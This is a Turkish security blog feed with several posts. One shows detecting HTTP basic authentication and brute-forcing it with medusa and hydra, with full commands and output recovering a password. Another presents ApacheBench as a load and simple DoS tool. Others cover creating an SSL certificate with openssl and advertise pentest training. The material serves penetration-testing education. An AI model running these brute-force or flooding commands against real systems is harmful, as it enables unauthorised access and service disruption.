Parola, günümüz güvenlik dünyasının en zayıf halkalarından biridir. Güvenliğine ciddi önem verilmiş sistemler birden fazla yetkilendirme sistemi kullanarak bu zaafiyeti bir oranda kapatmaya çalışırlar.

Fakat yeteri önem verilmemiş sistemlerde basit parolaların kullanımını günümüzde sıkça  görüyoruz. Bu kısa yazı basic authentication kullanılarak meraklı gözlerden uzak tutulmaya çalışılan sayfalara yönelik bruteforce denemelerinin nasıl gerçekleştirileceğini göstermektedir.

Hedef sistemin basic-auth kullandığı nasıl anlaşılır?

Hedef sistemde basic-auth ile korunduğu düşünülen sayfa istenerek dönen cevaptaki “WWW-Authenticate” satırı kontrol edilirse hangi authentication tipinin kullanıldığı anlaşılır.

root@bga-seclabs:~# telnet www.bga.com.tr 80
Trying 91.93.119.87…
Connected to www.bga.com.tr.
Escape character is ‘^]’.
GET /wp-login.php HTTP/1.1
Host:www.bga.com.tr

HTTP/1.1 401 Authorization Required
Date: Sat, 19 Feb 2011 19:40:49 GMT
Server: Apache
WWW-Authenticate: Basic realm=”Yaramazlik yasak!”
Content-Length: 401
Content-Type: text/html; charset=iso-8859-1

401 Authorization Required

Bu aşamadan sonra medusa, hydra veya Ncrack yazılımları kullanılarak bruteforce denemeleri gerçekleştirilebilir.

Bruteforce Çalışmalarında Medusa Kullanımı

#medusa -M http -m USER-AGENT:”Firefox-Explorer-99.1″ -m DIR:/gizli-alan -m AUTH:BASIC -h 10.10.10.1 -u bga -P bga-wordlist22

…
…
…
ACCOUNT CHECK: [http] Host: 10.10.10.1 (1 of 1, 0 complete) User: bga (1 of 1, 0 complete) Password: zzzzzz (4406 of 4417 complete)
ACCOUNT CHECK: [http] Host: 10.10.10.1 (1 of 1, 0 complete) User: bga (1 of 1, 0 complete) Password: zzzzzzy (4407 of 4417 complete)
ACCOUNT CHECK: [http] Host: 10.10.10.1 (1 of 1, 0 complete) User: bga (1 of 1, 0 complete) Password: zzzzzzz (4408 of 4417 complete)
ACCOUNT CHECK: [http] Host: 10.10.10.1 (1 of 1, 0 complete) User: bga (1 of 1, 0 complete) Password: zzzzzzz (4409 of 4417 complete)
ACCOUNT CHECK: [http] Host: 10.10.10.1 (1 of 1, 0 complete) User: bga (1 of 1, 0 complete) Password: zzzzzzzthis (4410 of 4417 complete)
ACCOUNT CHECK: [http] Host: 10.10.10.1 (1 of 1, 0 complete) User: bga (1 of 1, 0 complete) Password: zzzzzzzz (4411 of 4417 complete)
ACCOUNT CHECK: [http] Host: 10.10.10.1 (1 of 1, 0 complete) User: bga (1 of 1, 0 complete) Password: zzzzzzzz (4412 of 4417 complete)
ACCOUNT CHECK: [http] Host: 10.10.10.1 (1 of 1, 0 complete) User: bga (1 of 1, 0 complete) Password: zzzzzzzzzz (4413 of 4417 complete)
ACCOUNT CHECK: [http] Host: 10.10.10.1 (1 of 1, 0 complete) User: bga (1 of 1, 0 complete) Password: zzzzzzzzzzzzz (4414 of 4417 complete)
ACCOUNT CHECK: [http] Host: 10.10.10.1 (1 of 1, 0 complete) User: bga (1 of 1, 0 complete) Password: zzzzzzzzzzzzzzzzzz (4415 of 4417 complete)
ACCOUNT CHECK: [http] Host: 10.10.10.1 (1 of 1, 0 complete) User: bga (1 of 1, 0 complete) Password: {log} (4416 of 4417 complete)
ACCOUNT CHECK: [http] Host: 10.10.10.1 (1 of 1, 0 complete) User: bga (1 of 1, 0 complete) Password: 0u7b00k (4417 of 4417 complete)

ACCOUNT FOUND: [http] Host: 10.10.10.1 User: bga Password: 0u7b00k [SUCCESS]

Bruteforce Çalışmalarında Hydra Kullanımı

# hydra -l bga -P bga-wordlist22 -f 10.10.10.1 http-get /test -vV
Hydra v5.4 (c) 2006 by van Hauser / THC – use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2010-11-28 11:16:43
[DATA] 16 tasks, 1 servers, 4417 login tries (l:1/p:4417), ~276 tries per task
[DATA] attacking service http-get on port 80
…
…

[ATTEMPT] target 10.10.10.1 – login “bga” – pass “01214nd0” – child 26 – 675 of 4417
[ATTEMPT] target 10.10.10.1 – login “bga” – pass “0123” – child 27 – 676 of 4417
[ATTEMPT] target 10.10.10.1 – login “bga” – pass “012301279x” – child 28 – 677 of 4417
[ATTEMPT] target 10.10.10.1 – login “bga” – pass “012307120chi1u5” – child 29 – 678 of 4417
[ATTEMPT] target 10.10.10.1 – login “bga” – pass “0123071246in3” – child 0 – 679 of 4417
[ATTEMPT] target 10.10.10.1 – login “bga” – pass “0123071246u5” – child 1 – 680 of 4417
[ATTEMPT] target 10.10.10.1 – login “bga” – pass “01230c41294” – child 2 – 681 of 4417
[ATTEMPT] target 10.10.10.1 – login “bga” – pass “01230d0n” – child 3 – 682 of 4417
[ATTEMPT] target 10.10.10.1 – login “bga” – pass “01230d0n7” – child 4 – 683 of 4417
[ATTEMPT] target 10.10.10.1 – login “bga” – pass “01230d0n70id” – child 5 – 684 of 4417
[ATTEMPT] target 10.10.10.1 – login “bga” – pass “01230d0n7id43” – child 6 – 685 of 4417
[ATTEMPT] target 10.10.10.1 – login “bga” – pass “01230d0n7in3” – child 7 – 686 of 4417
[ATTEMPT] target 10.10.10.1 – login “bga” – pass “01230d0x4” – child 8 – 687 of 4417
[ATTEMPT] target 10.10.10.1 – login “bga” – pass “01230ph45i5” – child 9 – 688 of 4417
[ATTEMPT] target 10.10.10.1 – login “bga” – pass “01230ph45in3” – child 10 – 689 of 4417
[ATTEMPT] target 10.10.10.1 – login “bga” – pass “01230ph45in43” – child 11 – 690 of 4417
[STATUS] attack finished for 10.10.10.1 (waiting for childs to finish)
[80][www] host: 10.10.10.1 login: bga password: 0u7b00k
[ATTEMPT] target 10.10.10.1 – login “bga” – pass “0u7b00k” – child 3 – 4417 of 4417
Hydra (http://www.thc.org) finished at 2010-11-28 11:19:33

Her iki araç da hemen hemen aynı hızlarda parola deneme işlemi yapabiliyor. Her iki aracın da performansı sunucu kapasitesi, yapılandırımı ve bant genişliğiyle orantılıdır.

Detay bilgi için “Apache Htaccess Korumalı Sayfalara Yönelik Güvenlik Testleri” konulu  belge incelenebilir.

The post Basic Authentication Korumalı Sayfalara Bruteforce Denemesi first appeared on Complexity is the enemy of Security.

Java Teknolojileri ve Programcıları Derneği’nin ev sahipliğinde, Java dergisinin sponsorluğuna gerçekleştirilen “Web Uygulama Güven(siz)liği 2.0” konulu konferansa ait sunum dosyasına aşağıdaki adresten erişilebilir.

http://www.bga.com.tr/calismalar/web-insecurity.pdf

Etkinlik, sıcak bir yaz akşamı olmasına rağmen beklenmedik bir katılımla gerçekleştirildi. Katılımcıların sıcak kanlılığı ve organizasyonun mükemmel işleyişi sayesinde oldukca güzel bir akşam geçirdik.

Etkinliğie ait fotoğraflara ve yorumlara http://www.jtpd.org/blogs/item/jts-11de-neler-oldu–web-guvensizligi-semineri–huzeyfe-onal adresinden erişebilirsiniz.

The post Web Uygulama Güven(siz)liği Sunumu first appeared on Complexity is the enemy of Security.

Katılım ücretsizdir.

Not : Etkinliğe gelirken aman bir şey yemeyin, pizza ve içecekler ücretsiz.

Etkinlik Sponsorumuz : Java Dergisi

İşte etkinlik planımız :

19.00 – 19.10 – Hızlı tanışma seansı – Kartvizitlerinizi yanınızda getirmeyi unutmayınız !

19.15 – 19.30 – Pizza partisi

19.35 – 21.00 – Huzeyfe ÖNAL’ın konuşması

Konuşma detayları
Konu : Web uygulama güven(siz)liği 2.0

• • Web uygulamaları ve güvenlik açısından önemi
  • Web uygulama güvenliğinin bağlı olduğu bileşenler
  • Türkiye ve dünyadan web uygulamalarında yaşanan hacking olayları
  • Hackerlar web uygulamalarını nasıl ele geçirirler?
  • Güvenlikciler web uygulamalarını nasıl güvenli hale getirirler?
  • Hackerlar güvenlikcilerin aldıkları önlemleri nasıl aşarlar?

Kaykan: http://www.jtpd.org/blogs/item/11-jts-java-teknoloji-saati

The post [Etkinlik] Web uygulama güven(siz)liği 2.0 first appeared on Complexity is the enemy of Security.

Sertifika işlemleri için komut satırından openssl, grafik arabirim tercih ediyorsanız XCA kullanabilirsiniz.

Adım adım sertifika oluşturma ve kendi CA’miz tarafından sertifikanın onaylanması

1- Sertifika OTORİTESİ Oluşturma

1.1 Gizli anahtar oluşturma

# openssl genrsa -des3 -out ca.key 2048

1.2 CA için sertifika oluşturma

# openssl req -new -x509 -days 3650 -key ca.key -out ca.crt
Enter pass phrase for ca.key:
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter ‘.’, the field will be left blank.
—–
Country Name (2 letter code) [AU]:TR
State or Province Name (full name) [Some-State]:Istanbul
Locality Name (eg, city) []:Istanbul
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Bilgi Guvenligi AKADEMISI
Organizational Unit Name (eg, section) []:Training
Common Name (eg, YOUR name) []:www.bga.com.tr
Email Address []:[email protected]
You have new mail in /var/mail/root

Web sunucu için gizli anahtarın oluşturulması
# openssl genrsa -des3 -out sunucu.key 2048
Generating RSA private key, 2048 bit long modulus
………………………………………………………………+++
………..+++
e is 65537 (0×10001)
Enter pass phrase for sunucu.key:
Verifying – Enter pass phrase for sunucu.key:

2. Sunucu için certificate imzalama isteği

# openssl req -new -key sunucu.key -out sunucu.csr

Enter pass phrase for sunucu.key:
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter ‘.’, the field will be left blank.
—–
Country Name (2 letter code) [AU]:TR
State or Province Name (full name) [Some-State]:Istanbul
Locality Name (eg, city) []:Istanbul
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Bilgi Guvenligi AKADEMISI
Organizational Unit Name (eg, section) []:Egitim
Common Name (eg, YOUR name) []:www.bga.com.tr
Email Address []:[email protected]

Please enter the following ‘extra’ attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:
You have new mail in /var/mail/root

[root@labs ~/CA]# ls -ltr
total 8
-rw-r–r– 1 root wheel 0 Jun 15 08:17 my-ca.key
-rw-r–r– 1 root wheel 1751 Jun 15 08:17 ca.key
-rw-r–r– 1 root wheel 1740 Jun 15 08:19 ca.crt
-rw-r–r– 1 root wheel 1743 Jun 15 08:22 sunucu.key
-rw-r–r– 1 root wheel 1082 Jun 15 08:25 sunucu.csr

3. CA(Sertifika Otoritesi) kullanarak CSR’i onaylama

# openssl x509 -req -in sunucu.csr -out sunucu.crt -sha1 -CA ca.crt -CAkey ca.key -CAcreateserial -days 730
Signature ok
subject=/C=TR/ST=Istanbul/L=Istanbul/O=Bilgi Guvenligi AKADEMISI/OU=Egitim/CN=www.bga.com.tr/[email protected]
Getting CA Private Key
Enter pass phrase for ca.key:
You have new mail in /var/mail/root

#chmod 400 *.key

4. Apache’i SSL ile başlatma

# apachectl start

Apache/2.2.13 mod_ssl/2.2.13 (Pass Phrase Dialog)
Some of your private key files are encrypted for security reasons.
In order to read them you have to provide the pass phrases.

Server www.bga.com.tr:443 (RSA)
Enter pass phrase:

OK: Pass Phrase Dialog successful.

The post Apache İçin SSL Sertifikası Oluşturma first appeared on Complexity is the enemy of Security.

Çoğu güvenlik uzmanı web uygulama açıklıklarını IPS ile engelleyebileceğini düşünüyor.Bu tamamen olmasa da büyük oranda yanlış bir algı. Web uygulamalarının büyük bir çoğunluğunu IPS ile korunamayacak kadar karışıktır.  Bir şeyi korumak için öncelikle onun nasıl çalıştığını ve korumak istediğiniz nesneye yönelik tehditleri iyi bilmelisiniz.  Bu da ya konuyla ilgili eğitimler alarak ya da konuya özel zaman ayırıp kendinizi geliştirerek olabilir.

Web uygulama güvenliği konusuna ilgi duyan ama  konuya hakim olmadığı için çok zaman harcamadan hazır, pratik ve tecrübeli birilerinden konuyu uygulamalı öğrenmek isteyenler için  “Web Application Pentest” eğitimimiz  gelen talepler üzerine Mayıs ayında tekrar açılıyor.  Kariyer ve güvenlik konusunda rakiplerinizden bir adım daha önde olmak için kaçırılmayacak bir eğitim.

Eğitim içeriği ve tüm detaylar https://www.bgasecurity.com/egitim/web-uygulama-guvenlik-testleri-egitimi/ adresinden edinilebilir.

Eğitim içeriği

1. Eğitim Giriş
2. Web Standartları
3. Doğrulama Eğilimi
4. Otomatize Araçlar
5. Arama Motoru Keşif Teknikleri
6. Girdi Noktaları Bulma Teknikleri
7. Yayınlanmış Zafiyet Arama Teknikleri
8. HTTP Bağlantı Güvenliği
9. SSL Zayıflıkları
10. HTTP Metotları Denetimi
11. Kimlik Doğrulama Çeşitleri
12. Kaba Kuvvet Denetimi
13. Güvensiz CAPTCHA
14. Session Fixation
15. CSRF Denetimi
16. Dizin Gezinimi
17. Hak Yükseltme Denetimi
18. İş Mantığı Denetimi
19. Yansıtılan XSS Denetimi
20. Depolanmış XSS Denetimi
21. SQL Enjeksiyonu Denetimi
22. Kod Enjeksiyonu Denetimi
23. İşletim Sistemi Komut Enjeksiyonu Denetimi
24. Web Servis Teknolojisi Giriş
25. WSDL Denetimi
26. Ajax Giriş
27. Ajax Denetimi

The post Web Application Pentest Eğitimi 26 Haziran 2010 first appeared on Complexity is the enemy of Security.

Web sunucularının performansını ölçme amaçlı çeşitli araçlar vardır. Bunlar arasında kolay kullanımı ve esnekliğinden dolayı ab(Apache HTTP server benchmarking tool) dikkat çeker.

Ab her ne kadar Apache projesi olsa da herhangi bir web sunucuyu test etme amaçlı kullanılabilir.  Ab ile çeşitli özelliklerde HTTP istekleri göndererek sunucunun işleme kapasitesi ölçülebilir. Ab aynı zamanda basit bir DOS aracıdır, hedef sisteme eş zamanlı yüzlerce HTTP GET/POST/HEAD istekleri göndererek web sunucunun cevap veremez hale gelmesini sağlayabilir.

Basit kullanımı:

# ab -c 900 -n 1000 http://www.sayfa.com/
This is ApacheBench, Version 1.3d <$Revision: 1.73 XXgt; apache-1.3
Copyright (c) 1996 Adam Twiss, Zeus Technology Ltd, http://www.zeustech.net/
Copyright (c) 2006 The Apache Software Foundation, http://www.apache.org/

Benchmarking www.sayfa.com (be patient)
Completed 100 requests
Completed 200 requests
Completed 300 requests
Completed 400 requests
Completed 500 requests
Completed 600 requests
Completed 700 requests
Completed 800 requests
Completed 900 requests
Finished 1000 requests
Server Software:        Apache-Coyote/1.1
Server Hostname:        www.sayfa.com
Server Port:            80

Document Path:          /
Document Length:        4767 bytes

Concurrency Level:      900
Time taken for tests:   6.501 seconds
Complete requests:      1000
Failed requests:        0
Broken pipe errors:     0
Total transferred:      5339849 bytes
HTML transferred:       4893919 bytes
Requests per second:    153.82 [#/sec] (mean)
Time per request:       5850.90 [ms] (mean)
Time per request:       6.50 [ms] (mean, across all concurrent requests)
Transfer rate:          821.39 [Kbytes/sec] received

Connnection Times (ms)
min  mean[+/-sd] median   max
Connect:        7   119  655.6     28  6246
Processing:    28   405  737.2     69  4144
Waiting:       20   405  737.2     69  4144
Total:         28   525 1018.6    101  6419

Percentage of the requests served within a certain time (ms)
50%    101
66%    425
75%    523
80%    602
90%   1192
95%   3197
98%   4177
99%   6236
100%   6419 (last request)
You have new mail in /var/mail/root

Çıktıyı inceleyecek olursak sayfa isteğimiz en hızlı 101, en yavaş 6419 ms sürmüş. Saniyede 153 HTTP GET isteği göndermiş.

Ab parametreleri:

-n parametresi toplamda kaç adet HTTP isteğinin gönderileceğini belirler
-k parametresi HTTP bağlantılarının keepalive kurulacağını belirler
-c parametresi anlık kaç adet HTTP bağlantısı kurulacağını belirler
-t parametresi saniye cinsinden testin ne kadar süreceğini belirler

Ab ile sadece HTTP GET değil, POST istekleri de gönderilebilir. Böylece web sayfası üzerindeki dinamik alanlar  ve dinamik alanlara veri sağlayan veritabanı performansı da test edilmiş olur.

#ab -n 1000 -T ‘application/x-www-form-urlencoded’ -p post_me.txt http://www.sayfa.com/login.aspx

Ek olarak siege, httperf, httping gibi araçlar da web sunucu performans testlerinde kullanılabilir.

The post Web sunuculara yönelik performans/DoS testleri first appeared on Complexity is the enemy of Security.

Çoğu güvenlik uzmanı web uygulama açıklıklarını IPS ile engelleyebileceğini düşünüyor. Bu tamamen olmasa da büyük oranda yanlış bir algı. Web uygulamalarının büyük bir çoğunluğunu IPS ile korunamayacak kadar karışıktır.  Bir şeyi korumak için öncelikle onun nasıl çalıştığını ve korumak istediğiniz nesneye yönelik tehditleri iyi bilmelisiniz.  Bu da ya konuyla ilgili eğitimler alarak ya da konuya özel zaman ayırıp kendinizi geliştirerek olabilir.

Web uygulama güvenliği konusuna ilgi duyan ama  konuya hakim olmadığı için çok zaman harcamadan hazır, pratik ve tecrübeli birilerinden konuyu uygulamalı öğrenmek isteyenler için  “Web Application Pentest” eğitimimiz  gelen talepler üzerine Mayıs ayında tekrar açılıyor.  Kariyer ve güvenlik konusunda rakiplerinizden bir adım daha önde olmak için kaçırılmayacak bir eğitim.

Eğitim içeriği ve tüm detaylar https://www.bgasecurity.com/egitim/web-uygulama-guvenlik-testleri-egitimi/ adresinden edinilebilir.

Eğitim içeriği

1. Eğitim Giriş
2. Web Standartları
3. Doğrulama Eğilimi
4. Otomatize Araçlar
5. Arama Motoru Keşif Teknikleri
6. Girdi Noktaları Bulma Teknikleri
7. Yayınlanmış Zafiyet Arama Teknikleri
8. HTTP Bağlantı Güvenliği
9. SSL Zayıflıkları
10. HTTP Metotları Denetimi
11. Kimlik Doğrulama Çeşitleri
12. Kaba Kuvvet Denetimi
13. Güvensiz CAPTCHA
14. Session Fixation
15. CSRF Denetimi
16. Dizin Gezinimi
17. Hak Yükseltme Denetimi
18. İş Mantığı Denetimi
19. Yansıtılan XSS Denetimi
20. Depolanmış XSS Denetimi
21. SQL Enjeksiyonu Denetimi
22. Kod Enjeksiyonu Denetimi
23. İşletim Sistemi Komut Enjeksiyonu Denetimi
24. Web Servis Teknolojisi Giriş
25. WSDL Denetimi
26. Ajax Giriş
27. Ajax Denetimi

The post Web Application Pentest Eğitimi 22 Mayıs 2010 first appeared on Complexity is the enemy of Security.

Bu soruyu Güvenlik bülteninin her sayısında çeşitli uzman arkadaşlara soruyoruz ve oldukca çeşitli cevaplar geliyor, merak edenler sertifika programları hakkındaki sektörün ileri gelenleri tarafından verilen cevaplara röportajlar kısmından ulaşabilir.

Hayatın bir gerçek yüzü bir de yaşanan yüzü vardır, sertifikalara çeşitli açılardan eleştiri getirebilir, hatta gereksiz denilebilir ama sektörün büyük bir kısmında sertifikaların ciddi şekilde değerlendirmeye alındığı gerçeğini değiştiremeyiz. Özellikle herkesin ben herşeyi biliyorum dediği günümüzde  sertifikalar bilgi ölçme aracı olarak kullanılıyor.

Güvenlik sektöründe uzun yıllardır varlığını geliştirerek sürdürmüş çeşitli sertifikalar vardır. Bunların arasında en karizmatik, en fazla para yapanı hiç şüphesiz ISC2 tarafından verilen CISSP sertifikası.  Türkiye’de de bu sertifikaya olan ihtiyaç ve talep gün geçtikce artıyor. Çeşitli arkadaşlarla konuşurken her birinin Cissp ile ilgili çeşitli forum/listelere üye olduğunu gördüm. Değişik ortamlardan edindikleri bilgileri Türkçe olarak tartışmak, paylaşma adına CISSP-TR listesini kurmaya karar verdim.

Liste kısaca Türkiye’de  Cissp sınavına hazırlananlar için aşağıdaki işlevleri yerine getirme amacı taşımaktadır:

• Kaynak paylaşımı
• Sertifika sınavları hakkında tecrübe paylaşımı
• Çalışma gruplarının kurulması ve yönetimi
• Ücretli/ücretsiz eğitim duyurularının paylaşılması

Liste arşivi sadece üyelere açık olacaktır.

Üye olmak için:

[email protected]  adresine boş bir e-posta gönderebilir
ya da
http://groups.google.com/group/cissp-tr adresine giderek Google hesabınızla listeye kayıt olabilirsiniz.

 Liste yönetimi adına <Huzeyfe ÖNAL>

The post [CISSP-TR] Türkçe CISSP E-posta Listesi first appeared on Complexity is the enemy of Security.

Eğitimler hakkında detay bilgi için http://www.guvenlikegitimleri.com sayfasını ziyaret edebilirsiniz.

The post Mart 2010 Güvenlik Eğitimleri first appeared on Complexity is the enemy of Security.

Eğitimlerde uygulamalar Netsparker kullanılarak gerçekleştirilecektir.

Erken kayıtlarda %20 indirim uygulanıyor

The post Web uygulama güvenlik testleri eğitimi 13 Mart 2010 first appeared on Complexity is the enemy of Security.